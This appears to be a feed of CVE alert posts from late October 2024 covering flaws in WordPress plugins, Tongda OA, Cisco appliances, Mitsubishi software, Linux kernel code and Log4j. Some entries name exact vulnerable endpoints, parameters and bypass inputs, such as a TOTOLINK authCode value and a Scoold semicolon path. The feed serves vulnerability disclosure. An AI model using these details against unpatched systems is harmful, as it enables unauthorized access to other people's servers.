🚨 CVE-2024-7985The FileOrganizer – Manage WordPress and Website Files plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the "fileorganizer_ajax_handler" function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: The FileOrganizer Pro plugin must be installed and active to allow Subscriber+ users to upload files.🎖@cveNotify |
|
| 2024-11-01 13:07:31 |
🚨 CVE-2024-50334Scoold is a Q&A and a knowledge sharing platform for teams. A semicolon path injection vulnerability was found on the /api;/config endpoint. By appending a semicolon in the URL, attackers can bypass authentication and gain unauthorised access to sensitive configuration data. Furthermore, PUT requests on the /api;/config endpoint while setting the Content-Type: application/hocon header allow unauthenticated attackers to file reading via HOCON file inclusion. This allows attackers to retrieve sensitive information such as configuration files from the server, which can be leveraged for further exploitation. The vulnerability has been fixed in Scoold 1.64.0. A workaround would be to disable the Scoold API with scoold.api_enabled = false.🎖@cveNotify |
|
| 2024-11-01 13:07:26 |
🚨 CVE-2024-48921Kyverno is a policy engine designed for Kubernetes. A kyverno ClusterPolicy, ie. "disallow-privileged-containers," can be overridden by the creation of a PolicyException in a random namespace. By design, PolicyExceptions are consumed from any namespace. Administrators may not recognize that this allows users with privileges to non-kyverno namespaces to create exceptions. This vulnerability is fixed in 1.13.0.🎖@cveNotify |
|
| 2024-11-01 13:07:25 |
🚨 CVE-2024-20493A vulnerability in the login authentication functionality of the Remote Access SSL VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to deny further VPN user authentications for several minutes, resulting in a temporary denial of service (DoS) condition. This vulnerability is due to ineffective handling of memory resources during the authentication process. An attacker could exploit this vulnerability by sending crafted packets, which could cause resource exhaustion of the authentication process. A successful exploit could allow the attacker to deny authentication for Remote Access SSL VPN users for several minutes, resulting in a temporary DoS condition.🎖@cveNotify |
|
| 2024-11-01 12:37:25 |
🚨 CVE-2024-10654A vulnerability has been found in TOTOLINK LR350 up to 9.3.5u.6369 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /formLoginAuth.htm. The manipulation of the argument authCode with the input 1 leads to authorization bypass. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 11:37:24 |
🚨 CVE-2024-10367The Otter Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-11-01 10:37:25 |
🚨 CVE-2024-10652IDExpert from CHANGING Information Technology does not properly validate a parameter for a specific functionality, allowing unauthenticated remote attackers to inject JavsScript code and perform Reflected Cross-site scripting attacks.🎖@cveNotify |
|
| 2024-11-01 10:37:24 |
🚨 CVE-2024-10232The Group Chat & Video Chat by AtomChat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's atomchat shortcode in all versions up to, and including, 1.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-01 09:37:25 |
🚨 CVE-2023-6943Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 versions 1.106L and prior, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to execute a malicious code by RPC with a path to a malicious library while connected to the products.🎖@cveNotify |
|
| 2024-11-01 09:37:24 |
🚨 CVE-2023-6942Missing Authentication for Critical Function vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 versions 1.106L and prior, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to bypass authentication by sending specially crafted packets and connect to the products illegally.🎖@cveNotify |
|
| 2024-11-01 06:37:25 |
🚨 CVE-2024-0106NVIDIA ConnectX Host Firmware for the BlueField Data Processing Unit (DPU) contains a vulnerability where an attacker may cause an improper handling of insufficient privileges issue. A successful exploit of this vulnerability may lead to denial of service, data tampering, and limited information disclosure.🎖@cveNotify |
|
| 2024-11-01 06:37:24 |
🚨 CVE-2024-0105NVIDIA ConnectX Firmware contains a vulnerability where an attacker may cause an improper handling of insufficient privileges issue. A successful exploit of this vulnerability may lead to denial of service, data tampering, and limited information disclosure.🎖@cveNotify |
|
| 2024-11-01 05:37:25 |
🚨 CVE-2024-21510Versions of the package sinatra from 0.0.0 are vulnerable to Reliance on Untrusted Inputs in a Security Decision via the X-Forwarded-Host (XFH) header. When making a request to a method with redirect applied, it is possible to trigger an Open Redirect Attack by inserting an arbitrary address into this header. If used for caching purposes, such as with servers like Nginx, or as a reverse proxy, without handling the X-Forwarded-Host header, attackers can potentially exploit Cache Poisoning or Routing-based SSRF.🎖@cveNotify |
|
| 2024-11-01 05:37:24 |
🚨 CVE-2024-10620A vulnerability was found in knightliao Disconf 2.6.36. It has been classified as critical. This affects an unknown part of the file /api/config/list of the component Configuration Center. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 04:37:33 |
🚨 CVE-2024-10617A vulnerability classified as critical was found in Tongda OA up to 11.10. This vulnerability affects unknown code of the file /pda/workflow/check_seal.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 04:37:32 |
🚨 CVE-2024-10616A vulnerability classified as critical has been found in Tongda OA up to 11.9. This affects an unknown part of the file /pda/workflow/webSignSubmit.php. The manipulation of the argument saleId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 03:37:44 |
🚨 CVE-2024-10615A vulnerability was found in Tongda OA 2017 up to 11.10. It has been rated as critical. Affected by this issue is some unknown functionality of the file /general/approve_center/query/list/input_form/delete_data_attach.php. The manipulation of the argument RUN_ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 03:37:43 |
🚨 CVE-2024-10612A vulnerability was found in ESAFENET CDG 5. It has been classified as critical. Affected is the function removeHookInvalidCourse of the file /com/esafenet/servlet/system/HookInvalidCourseService.java. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-11-01 02:38:02 |
🚨 CVE-2024-10611A vulnerability was found in ESAFENET CDG 5 and classified as critical. This issue affects the function delProtocol of the file /com/esafenet/servlet/system/PrintScreenListService.java. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-11-01 02:38:01 |
🚨 CVE-2024-8553A vulnerability was found in Foreman's loader macros introduced with report templates. These macros may allow an authenticated user with permissions to view and create templates to read any field from Foreman's database. By using specific strings in the loader macros, users can bypass permissions and access sensitive information.🎖@cveNotify |
|
| 2024-11-01 01:37:25 |
🚨 CVE-2024-10608A vulnerability was found in code-projects Courier Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 01:37:24 |
🚨 CVE-2024-10607A vulnerability was found in code-projects Courier Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /track-result.php. The manipulation of the argument Consignment leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-01 00:37:34 |
🚨 CVE-2024-10602A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this issue is some unknown functionality of the file /general/approve_center/list/input_form/data_picker_link.php. The manipulation of the argument dataSrc leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-31 23:37:25 |
🚨 CVE-2024-10601A vulnerability has been found in Tongda OA 2017 up to 11.10 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /general/address/private/address/query/delete.php. The manipulation of the argument where_repeat leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-31 23:37:24 |
🚨 CVE-2023-2062Missing Password Field Masking vulnerability in Mitsubishi Electric Corporation EtherNet/IP configuration tools SW1DNN-EIPCT-BD and SW1DNN-EIPCTFX5-BD allows a remote unauthenticated attacker to know the password for MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP. This vulnerability results in authentication bypass vulnerability, which allows the attacker to access MELSEC iQ-R Series EtherNet/IP module RJ71EIP91 and MELSEC iQ-F Series EtherNet/IP module FX5-ENET/IP via FTP.🎖@cveNotify |
|
| 2024-10-31 22:37:25 |
🚨 CVE-2024-10599A vulnerability, which was classified as problematic, has been found in Tongda OA 2017 up to 11.7. This issue affects some unknown processing of the file /inc/package_static_resources.php. The manipulation leads to resource consumption. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-31 22:37:24 |
🚨 CVE-2024-10598A vulnerability classified as critical was found in Tongda OA 11.2/11.3/11.4/11.5/11.6. This vulnerability affects unknown code of the file general/hr/setting/attendance/leave/data.php of the component Annual Leave Handler. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-31 20:37:25 |
🚨 CVE-2024-24093SQL Injection vulnerability in Code-projects Scholars Tracking System 1.0 allows attackers to run arbitrary code via Personal Information Update information.🎖@cveNotify |
|
| 2024-10-31 20:37:24 |
🚨 CVE-2023-49100Trusted Firmware-A (TF-A) before 2.10 has a potential read out-of-bounds in the SDEI service. The input parameter passed in register x1 is not validated well enough in the function sdei_interrupt_bind. The parameter is passed to a call to plat_ic_get_interrupt_type. It can be any arbitrary value passing checks in the function plat_ic_is_sgi. A compromised Normal World (Linux kernel) can enable a root-privileged attacker to issue arbitrary SMC calls. Using this primitive, he can control the content of registers x0 through x6, which are used to send parameters to TF-A. Out-of-bounds addresses can be read in the context of TF-A (EL3). Because the read value is never returned to non-secure memory or in registers, no leak is possible. An attacker can still crash TF-A, however.🎖@cveNotify |
|
| 2024-10-31 20:07:32 |
🚨 CVE-2014-9809ImageMagick allows remote attackers to cause a denial of service (segmentation fault and application crash) via a crafted xwd image.🎖@cveNotify |
|
| 2024-10-31 20:07:26 |
🚨 CVE-2014-9808ImageMagick allows remote attackers to cause a denial of service (segmentation fault and application crash) via a crafted dpc image.🎖@cveNotify |
|
| 2024-10-31 20:07:25 |
🚨 CVE-2014-9805ImageMagick allows remote attackers to cause a denial of service (segmentation fault and application crash) via a crafted pnm file.🎖@cveNotify |
|
| 2024-10-31 20:07:24 |
🚨 CVE-2014-9804vision.c in ImageMagick allows remote attackers to cause a denial of service (infinite loop) via vectors related to "too many object."🎖@cveNotify |
|
| 2024-10-31 19:37:32 |
🚨 CVE-2024-20415A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information.🎖@cveNotify |
|
| 2024-10-31 19:37:31 |
🚨 CVE-2024-20273A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by inserting crafted input into various data fields in an affected interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface, or access sensitive, browser-based information.🎖@cveNotify |
|
| 2024-10-31 19:37:26 |
🚨 CVE-2024-21099Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Data Visualization). The supported version that is affected is 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-10-31 19:37:25 |
🚨 CVE-2024-27279Directory traversal vulnerability exists in a-blog cms Ver.3.1.x series Ver.3.1.9 and earlier, Ver.3.0.x series Ver.3.0.30 and earlier, Ver.2.11.x series Ver.2.11.59 and earlier, Ver.2.10.x series Ver.2.10.51 and earlier, and Ver.2.9 and earlier versions. If this vulnerability is exploited, a user with editor or higher privilege who can login to the product may obtain arbitrary files on the server including password files.🎖@cveNotify |
|
| 2024-10-31 19:07:26 |
🚨 CVE-2024-49643Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Abdullah Irfan Whitelist allows Reflected XSS.This issue affects Whitelist: from n/a through 3.5.🎖@cveNotify |
|
| 2024-10-31 19:07:25 |
🚨 CVE-2024-5638The Formula theme for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘id’ parameter in the 'ti_customizer_notify_dismiss_recommended_plugins' AJAX action in all versions up to, and including, 0.5.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-31 18:37:30 |
🚨 CVE-2024-28515Buffer Overflow vulnerability in CSAPP_Lab CSAPP Lab3 15-213 Fall 20xx allows a remote attacker to execute arbitrary code via the lab3 of csapp,lab3/buflab-update.pl component.🎖@cveNotify |
|
| 2024-10-31 18:37:26 |
🚨 CVE-2024-27974Cross-site request forgery vulnerability in FUJIFILM printers which implement CentreWare Internet Services or Internet Services allows a remote unauthenticated attacker to alter user information. In the case the user is an administrator, the settings such as the administrator's ID, password, etc. may be altered. As for the details of affected product names, model numbers, and versions, refer to the information provided by the vendor listed under [References].🎖@cveNotify |
|
| 2024-10-31 18:37:25 |
🚨 CVE-2023-45918ncurses 6.4-20230610 has a NULL pointer dereference in tgetstr in tinfo/lib_termcap.c. NOTE: Multiple third parties have disputed this indicating upstream does not regard it as a security issue.🎖@cveNotify |
|
| 2024-10-31 18:07:33 |
🚨 CVE-2024-49645Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Ilias Gomatos Affiliate Platform allows Reflected XSS.This issue affects Affiliate Platform: from n/a through 1.4.8.🎖@cveNotify |
|
| 2024-10-31 17:37:32 |
🚨 CVE-2024-9675A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.🎖@cveNotify |
|
| 2024-10-31 17:37:25 |
🚨 CVE-2024-23280An injection issue was addressed with improved validation. This issue is fixed in Safari 17.4, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-10-31 17:37:24 |
🚨 CVE-2023-40105In backupAgentCreated of ActivityManagerService.java, there is a possible way to leak sensitive data due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-31 17:07:32 |
🚨 CVE-2024-9505The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-31 17:07:26 |
🚨 CVE-2024-10226The Arconix Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'box' shortcode in all versions up to, and including, 2.1.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-31 17:07:25 |
🚨 CVE-2022-30358OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /user/updatePassword via the userId and newPsw parameters. Authentication is required.🎖@cveNotify |
|
| 2024-10-31 17:07:24 |
🚨 CVE-2022-30357OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /profile/updateProfile via the userId and email parameters. Authentication is required.🎖@cveNotify |
|
| 2024-10-31 16:37:55 |
🚨 CVE-2021-47432In the Linux kernel, the following vulnerability has been resolved:lib/generic-radix-tree.c: Don't overflow in peek()When we started spreading new inode numbers throughout most of the 64bit inode space, that triggered some corner case bugs, in particularsome integer overflows related to the radix tree code. Oops.🎖@cveNotify |
|
| 2024-10-31 16:37:54 |
🚨 CVE-2024-26977In the Linux kernel, the following vulnerability has been resolved:pci_iounmap(): Fix MMIO mapping leakThe #ifdef ARCH_HAS_GENERIC_IOPORT_MAP accidentally also guards iounmap(),which means MMIO mappings are leaked.Move the guard so we call iounmap() for MMIO mappings.🎖@cveNotify |
|
| 2024-10-31 16:37:50 |
🚨 CVE-2024-26889In the Linux kernel, the following vulnerability has been resolved:Bluetooth: hci_core: Fix possible buffer overflowstruct hci_dev_info has a fixed size name[8] field so in the event thathdev->name is bigger than that strcpy would attempt to write past itssize, so this fixes this problem by switching to use strscpy.🎖@cveNotify |
|
| 2024-10-31 16:37:49 |
🚨 CVE-2024-21060Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-10-31 16:37:48 |
🚨 CVE-2024-1310The WooCommerce WordPress plugin before 8.6 does not prevent users with at least the contributor role from leaking products they shouldn't have access to. (e.g. private, draft and trashed products)🎖@cveNotify |
|
| 2024-10-31 16:37:44 |
🚨 CVE-2024-23079JGraphT Core v1.5.2 was discovered to contain a NullPointerException via the component org.jgrapht.alg.util.ToleranceDoubleComparator::compare(Double, Double). NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability. The submission may have been based on a tool that is not sufficiently robust for vulnerability identification.🎖@cveNotify |
|
| 2024-10-31 16:37:43 |
🚨 CVE-2024-2369The Page Builder Gutenberg Blocks WordPress plugin before 3.1.7 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-10-31 16:07:44 |
🚨 CVE-2024-7774A path traversal vulnerability exists in the `getFullPath` method of langchain-ai/langchainjs version 0.2.5. This vulnerability allows attackers to save files anywhere in the filesystem, overwrite existing text files, read `.txt` files, and delete files. The vulnerability is exploited through the `setFileContent`, `getParsedFile`, and `mdelete` methods, which do not properly sanitize user input.🎖@cveNotify |
|
| 2024-10-31 16:07:43 |
🚨 CVE-2024-49641Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Tidaweb Tida URL Screenshot allows Reflected XSS.This issue affects Tida URL Screenshot: from n/a through 1.0.🎖@cveNotify |
|
| 2024-10-31 16:07:40 |
🚨 CVE-2024-49640Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in AmaderCode Lab ACL Floating Cart for WooCommerce allows Reflected XSS.This issue affects ACL Floating Cart for WooCommerce: from n/a through 0.9.🎖@cveNotify |
|
| 2024-10-31 16:07:39 |
🚨 CVE-2024-49639Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Edward Stoever Monitor.Chat allows Reflected XSS.This issue affects Monitor.Chat: from n/a through 1.1.1.🎖@cveNotify |
|
| 2024-10-31 16:07:38 |
🚨 CVE-2024-48229funadmin 5.0.2 has a SQL injection vulnerability in the Curd one click command mode plugin.🎖@cveNotify |
|
| 2024-10-31 16:07:33 |
🚨 CVE-2024-48226Funadmin 5.0.2 is vulnerable to SQL Injection in curd/table/savefield.🎖@cveNotify |
|
| 2024-10-31 16:07:32 |
🚨 CVE-2024-48218Funadmin v5.0.2 has a SQL injection vulnerability in /curd/table/list.🎖@cveNotify |
|
| 2024-10-31 15:37:34 |
🚨 CVE-2024-26467A DOM based cross-site scripting (XSS) vulnerability in the component generator.html of tabatkins/railroad-diagrams before commit ea9a123 allows attackers to execute arbitrary Javascript via sending a crafted URL.🎖@cveNotify |
|
| 2024-10-31 15:37:33 |
🚨 CVE-2023-38405On Crestron 3-Series Control Systems before 1.8001.0187, crafting and sending a specific BACnet packet can cause a crash.🎖@cveNotify |
|
| 2024-10-31 14:37:47 |
🚨 CVE-2024-20347A vulnerability in Cisco Emergency Responder could allow an unauthenticated, remote attacker to conduct a CSRF attack, which could allow the attacker to perform arbitrary actions on an affected device. This vulnerability is due to insufficient protections for the web UI of an affected system. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user, such as deleting users from the device.🎖@cveNotify |
|
| 2024-10-31 14:37:40 |
🚨 CVE-2021-47089In the Linux kernel, the following vulnerability has been resolved:kfence: fix memory leak when cat kfence objectsHulk robot reported a kmemleak problem: unreferenced object 0xffff93d1d8cc02e8 (size 248): comm "cat", pid 23327, jiffies 4624670141 (age 495992.217s) hex dump (first 32 bytes): 00 40 85 19 d4 93 ff ff 00 10 00 00 00 00 00 00 .@.............. 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: seq_open+0x2a/0x80 full_proxy_open+0x167/0x1e0 do_dentry_open+0x1e1/0x3a0 path_openat+0x961/0xa20 do_filp_open+0xae/0x120 do_sys_openat2+0x216/0x2f0 do_sys_open+0x57/0x80 do_syscall_64+0x33/0x40 entry_SYSCALL_64_after_hwframe+0x44/0xa9 unreferenced object 0xffff93d419854000 (size 4096): comm "cat", pid 23327, jiffies 4624670141 (age 495992.217s) hex dump (first 32 bytes): 6b 66 65 6e 63 65 2d 23 32 35 30 3a 20 30 78 30 kfence-#250: 0x0 30 30 30 30 30 30 30 37 35 34 62 64 61 31 32 2d 0000000754bda12- backtrace: seq_read_iter+0x313/0x440 seq_read+0x14b/0x1a0 full_proxy_read+0x56/0x80 vfs_read+0xa5/0x1b0 ksys_read+0xa0/0xf0 do_syscall_64+0x33/0x40 entry_SYSCALL_64_after_hwframe+0x44/0xa9I find that we can easily reproduce this problem with the followingcommands: cat /sys/kernel/debug/kfence/objects echo scan > /sys/kernel/debug/kmemleak cat /sys/kernel/debug/kmemleakThe leaked memory is allocated in the stack below: do_syscall_64 do_sys_open do_dentry_open full_proxy_open seq_open ---> alloc seq_file vfs_read full_proxy_read seq_read seq_read_iter traverse ---> alloc seq_bufAnd it should have been released in the following process: do_syscall_64 syscall_exit_to_user_mode exit_to_user_mode_prepare task_work_run ____fput __fput full_proxy_release ---> free hereHowever, the release function corresponding to file_operations is notimplemented in kfence. As a result, a memory leak occurs. Therefore,the solution to this problem is to implement the corresponding releasefunction.🎖@cveNotify |
|
| 2024-10-31 14:37:39 |
🚨 CVE-2023-40112In ippSetValueTag of ipp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure of past print jobs or other print-related information, with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-31 14:07:46 |
🚨 CVE-2021-47603In the Linux kernel, the following vulnerability has been resolved:audit: improve robustness of the audit queue handlingIf the audit daemon were ever to get stuck in a stopped state thekernel's kauditd_thread() could get blocked attempting to send auditrecords to the userspace audit daemon. With the kernel threadblocked it is possible that the audit queue could grow unbounded ascertain audit record generating events must be exempt from the queuelimits else the system enter a deadlock state.This patch resolves this problem by lowering the kernel thread'ssocket sending timeout from MAX_SCHEDULE_TIMEOUT to HZ/10 and tweaksthe kauditd_send_queue() function to better manage the various auditqueues when connection problems occur between the kernel and theaudit daemon. With this patch, the backlog may temporarily growbeyond the defined limits when the audit daemon is stopped and thesystem is under heavy audit pressure, but kauditd_thread() willcontinue to make progress and drain the queues as it would for otherconnection problems. For example, with the audit daemon put into astopped state and the system configured to audit every syscall itwas still possible to shutdown the system without a kernel panic,deadlock, etc.; granted, the system was slow to shutdown but that isto be expected given the extreme pressure of recording every syscall.The timeout value of HZ/10 was chosen primarily throughexperimentation and this developer's "gut feeling". There is likelyno one perfect value, but as this scenario is limited in scope (rootprivileges would be needed to send SIGSTOP to the audit daemon), itis likely not worth exposing this as a tunable at present. This canalways be done at a later date if it proves necessary.🎖@cveNotify |
|
| 2024-10-31 14:07:45 |
🚨 CVE-2021-47602In the Linux kernel, the following vulnerability has been resolved:mac80211: track only QoS data frames for admission controlFor admission control, obviously all of that only works forQoS data frames, otherwise we cannot even access the QoSfield in the header.Syzbot reported (see below) an uninitialized value here dueto a status of a non-QoS nullfunc packet, which isn't evenlong enough to contain the QoS header.Fix this to only do anything for QoS data packets.🎖@cveNotify |
|
| 2024-10-31 13:37:25 |
🚨 CVE-2024-21120Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Core). Supported versions that are affected are 8.5.6 and 8.5.7. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Outside In Technology executes to compromise Oracle Outside In Technology. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Outside In Technology accessible data as well as unauthorized read access to a subset of Oracle Outside In Technology accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Outside In Technology. CVSS 3.1 Base Score 5.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).🎖@cveNotify |
|
| 2024-10-31 13:37:24 |
🚨 CVE-2024-22371Exposure of sensitive data by by crafting a malicious EventFactory and providing a custom ExchangeCreatedEvent that exposes sensitive data. Vulnerability in Apache Camel.This issue affects Apache Camel: from 3.21.X through 3.21.3, from 3.22.X through 3.22.0, from 4.0.X through 4.0.3, from 4.X through 4.3.0.Users are recommended to upgrade to version 3.21.4, 3.22.1, 4.0.4 or 4.4.0, which fixes the issue.🎖@cveNotify |
|
| 2024-10-31 13:07:25 |
🚨 CVE-2024-50479Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mansur Ahamed Woocommerce Quote Calculator allows Blind SQL Injection.This issue affects Woocommerce Quote Calculator: from n/a through 1.1.🎖@cveNotify |
|
| 2024-10-31 13:07:24 |
🚨 CVE-2023-31470SmartDNS through 41 before 56d0332 allows an out-of-bounds write because of a stack-based buffer overflow in the _dns_encode_domain function in the dns.c file, via a crafted DNS request.🎖@cveNotify |
|
| 2024-10-31 12:37:24 |
🚨 CVE-2021-45046It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.🎖@cveNotify |
|
| 2024-10-31 10:37:40 |
🚨 CVE-2024-43933Cross-Site Request Forgery (CSRF) vulnerability in WPMobile.App allows Stored XSS.This issue affects WPMobile.App: from n/a through 11.48.🎖@cveNotify |
|
| 2024-10-31 10:37:33 |
🚨 CVE-2024-43383Deserialization of Untrusted Data vulnerability in Apache Lucene.Net.Replicator.This issue affects Apache Lucene.NET's Replicator library: from 4.8.0-beta00005 through 4.8.0-beta00016.An attacker that can intercept traffic between a replication client and server, or control the target replication node URL, can provide a specially-crafted JSON response that is deserialized as an attacker-provided exception type. This can result in remote code execution or other potential unauthorized access.Users are recommended to upgrade to version 4.8.0-beta00017, which fixes the issue.🎖@cveNotify |
|
| 2024-10-31 10:37:32 |
🚨 CVE-2024-8376In Eclipse Mosquitto up to version 2.0.18a, an attacker can achieve memory leaking, segmentation fault or heap-use-after-free by sending specific sequences of "CONNECT", "DISCONNECT", "SUBSCRIBE", "UNSUBSCRIBE" and "PUBLISH" packets.🎖@cveNotify |
|
| 2024-10-31 07:37:25 |
